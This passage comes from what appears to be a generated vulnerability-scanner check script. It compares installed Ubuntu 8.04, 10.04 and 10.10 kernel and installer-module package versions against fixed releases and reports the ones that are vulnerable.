NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-386\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-generic\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-openvz\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-rt\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-server\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-virtual\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-xen\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-386\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-generic\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-server\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-virtual\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-386\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-generic\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-server\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-virtual\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-openvz\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-rt\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-xen\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.24\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.24\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"acpi-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"acpi-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ide-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ide-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ipv6-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ipv6-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23-generic-pae\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23-generic\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23-virtual\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-23-generic-pae\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-23-generic\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-23-virtual\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.35-1023.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-2.6.35-23\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.35\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-common\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 